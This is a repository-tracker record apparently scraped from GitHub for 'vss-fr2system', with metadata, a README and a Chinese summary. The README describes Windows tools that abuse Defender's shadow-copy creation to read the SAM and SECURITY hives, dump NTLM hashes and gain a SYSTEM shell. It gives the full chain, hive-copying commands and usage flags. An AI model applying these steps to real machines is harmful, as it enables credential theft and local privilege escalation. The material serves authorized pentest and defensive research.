[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-3563":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":15,"stars7d":15,"stars30d":16,"stars90d":14,"forks30d":14,"starsTrendScore":17,"compositeScore":18,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":21,"hasPages":19,"topics":22,"createdAt":9,"pushedAt":9,"updatedAt":23,"readmeContent":24,"aiSummary":25,"trendingCount":14,"starSnapshotCount":14,"syncStatus":26,"lastSyncTime":27,"discoverSource":28},3563,"vss-fr2system","sailay1996\u002Fvss-fr2system","sailay1996","test",null,"C",108,19,95,0,1,10,3,44.4,false,"main",true,[],"2026-06-12 04:00:18","# vss-fr2system\n\nTwo small tools that turn an **arbitrary file read** bug on Windows into a **SYSTEM shell**.\n\n- `vss_freeze\u002F` — creates a Volume Shadow Copy as a **standard user**, then holds it open so you have time to read the SAM\u002FSECURITY\u002FSYSTEM hives out of it\n- `fr2system\u002F` — takes the hives you copied out, decrypts the local NTLM hashes offline, and pops a SYSTEM shell\n\nTogether with any arb-file-read primitive that runs as SYSTEM (or anything that can read out of `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyN\\...`), this is a complete std-user → SYSTEM chain on a default Win10\u002FWin11 box.\n\n---\n\n## Background\n\nThis was extracted out of [**BlueHammer**](https:\u002F\u002Fgithub.com\u002FNightmare-Eclipse\u002FBlueHammer) — the Win Defender abuse research where we found that dropping an EICAR file under a watched path makes Defender create a Volume Shadow Copy as part of its remediation flow. We held a `RstrtMgr.dll` batch oplock on Defender's load path so Defender stays parked at the start of remediation, which in turn keeps the VSS alive for as long as we need.\n\nOriginally there was a Stage 2 cldflt freeze on top of that, but cldflt rejects non-OneDrive sync providers on Win11 24H2 (`CfRegisterSyncRoot` returns `0x80070057`). Just holding the Stage 1 oplock open turned out to be enough — Defender stays paused, VSS stays alive, no Cloud Files API at all.\n\n---\n\n## The chain\n\n### Real LPE (you already have an arb file read)\n\n```\n[ vss_simple_freeze.exe ] → [ your arb-read PoC ] → [ fr2system.exe ]\n creates VSS as std user reads SAM\u002FSECURITY cracks NTLM, pops SYSTEM\n holds it via oplock out of the VSS path shell\n```\n\n1. Run `vss_simple_freeze.exe --hold 120` as a normal user. It prints the VSS path, e.g. `\\Device\\HarddiskVolumeShadowCopy7`.\n2. Run your arb-file-read bug to read these out of the VSS:\n - `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyN\\Windows\\System32\\Config\\SAM`\n - `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyN\\Windows\\System32\\Config\\SECURITY`\n - Drop them as `C:\\Windows\\Temp\\fileread\\SAM` and `C:\\Windows\\Temp\\fileread\\SECURITY`.\n3. Run `fr2system.exe`. SYSTEM shell.\n\n### Testing without an arb-read bug\n\nIf you just want to verify the chain works end-to-end on your box, fake the arb-read step with an admin `cmd`:\n\n```cmd\n:: Window 1 - std user\nvss_simple_freeze.exe --hold 300\n\n:: Window 2 - admin cmd (simulating the arb-read primitive)\nmkdir C:\\Windows\\Temp\\fileread\ncopy \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\Windows\\System32\\Config\\SAM\" C:\\Windows\\Temp\\fileread\\SAM\ncopy \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\Windows\\System32\\Config\\SECURITY\" C:\\Windows\\Temp\\fileread\\SECURITY\n\n:: Window 3 - std user again\nfr2system.exe\n```\n\n(Replace `7` with whatever number `vss_simple_freeze` printed.)\n\n---\n\n## Usage\n\n### vss_simple_freeze\n\n```\nvss_simple_freeze.exe [options]\n\n --hold N Auto-release after N seconds (default: wait for Enter)\n --auto Non-interactive, hold up to 600s\n --publish FILE Write VSS path to FILE (default: %TEMP%\\vss_current.txt)\n --no-publish Don't write VSS path anywhere\n --event NAME Release when named event Local\\NAME is signaled\n --quiet Suppress per-second liveness output\n --help Show help\n\nExamples:\n vss_simple_freeze.exe # interactive, Enter to release\n vss_simple_freeze.exe --hold 120 # auto-release after 2 min\n vss_simple_freeze.exe --event lpe_done --hold 300 # release on signal or 5 min\n```\n\n### fr2system\n\n```\nfr2system.exe [options]\n\n (none) Default - read SAM\u002FSECURITY from C:\\Windows\\Temp\\fileread, escalate to SYSTEM\n --dump Dump NTLM hashes only, don't escalate\n --scan Scan for alternative credential sources\n --path DIR Use a different input directory\n --help Show help\n\nExamples:\n fr2system.exe\n fr2system.exe --dump\n fr2system.exe --path C:\\lab\\hives\n```\n\n`fr2system.exe` expects at least `SAM` in the input dir. `SECURITY` is optional (used for LSA secrets \u002F DPAPI keys).\n\n---\n\n## Build\n\nBoth projects use MSVC (static CRT, x64).\n\n```cmd\ncd vss_freeze\nbuild_vss_simple_freeze.bat\n\ncd fr2system\nmsbuild fr2system.sln \u002Fp:Configuration=Release \u002Fp:Platform=x64\n```\n\n---\n\n## Screenshots\n\nVSS creation:\n\n![vss_simple_freeze run](docs\u002Fvss_freeze.png)\n\nfr2system → SYSTEM shell:\n\n![fr2system run](docs\u002Ffr2system.png)\n\n---\n\n## Notes\n\n- Tested on Win10 22H2 and Win11 23H2\u002F24H2 with Defender enabled.\n- The VSS technique relies on Defender's remediation flow. With Defender disabled or replaced by another AV, the Stage 1 oplock won't fire and no VSS will be created — pick a different VSS primitive in that case.\n- This is research \u002F authorized pentest tooling. Don't run it on systems you're not allowed to.\n","vss-fr2system是一个工具集,旨在将Windows系统中的任意文件读取漏洞转化为SYSTEM权限的shell。该项目包括两个主要组件:`vss_freeze`和`fr2system`。前者能够以标准用户身份创建并保持卷影副本打开状态,使得攻击者有足够的时间从副本中读取SAM\u002FSECURITY\u002FSYSTEM注册表配置单元;后者则负责解密本地NTLM哈希值,并最终获取SYSTEM级别的访问权限。此项目特别适用于已经拥有任意文件读取能力的安全研究人员或渗透测试人员,在默认配置下的Windows 10\u002F11环境中实现标准用户到SYSTEM用户的权限提升。",2,"2026-06-11 02:54:42","CREATED_QUERY"]